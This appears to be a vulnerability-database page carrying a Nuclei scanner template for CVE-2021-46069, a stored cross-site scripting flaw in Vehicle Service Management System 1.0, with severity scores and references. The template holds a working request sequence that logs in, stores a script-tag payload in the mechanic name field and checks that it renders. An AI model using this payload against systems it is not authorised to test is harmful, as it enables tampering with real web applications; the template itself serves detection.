Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-46069
HistoryAug 31, 2022 - 3:17 p.m.

Vehicle Service Management System 1.0 - Stored Cross Site Scripting

2022-08-3115:17:13
ProjectDiscovery
github.com
cve
cve2021
xss
vms
authenticated
vehicle service management system project

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

4.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

44.3%

Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
id: CVE-2021-46069

info:
  name: Vehicle Service Management System 1.0 - Stored Cross Site Scripting
  author: TenBird
  severity: medium
  description: |
    Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Mechanic List section in login panel.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to the execution of arbitrary code or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
    - https://github.com/plsanu/CVE-2021-46069
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-46069
    cwe-id: CWE-79
    epss-score: 0.0011
    epss-percentile: 0.4404
    cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: vehicle_service_management_system_project
    product: vehicle_service_management_system
  tags: cve,cve2021,xss,vms,authenticated,vehicle_service_management_system_project

http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        POST /classes/Master.php?f=save_mechanic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
      - |
        GET /admin/?page=mechanics HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header_3, 'text/html')"
          - "status_code_3 == 200"
          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
        condition: and
# digest: 4b0a00483046022100cdfbccbe0028282fc3c2dbb564bcc6f9032c86fc9962d406721f143cbe4ca9d9022100b646da841b187e28551c31d240db040337c8b497445b34d75ab25d813b17fd62:922c64590222798bb761d5b6d8e72950

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

4.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

44.3%

Related for NUCLEI:CVE-2021-46069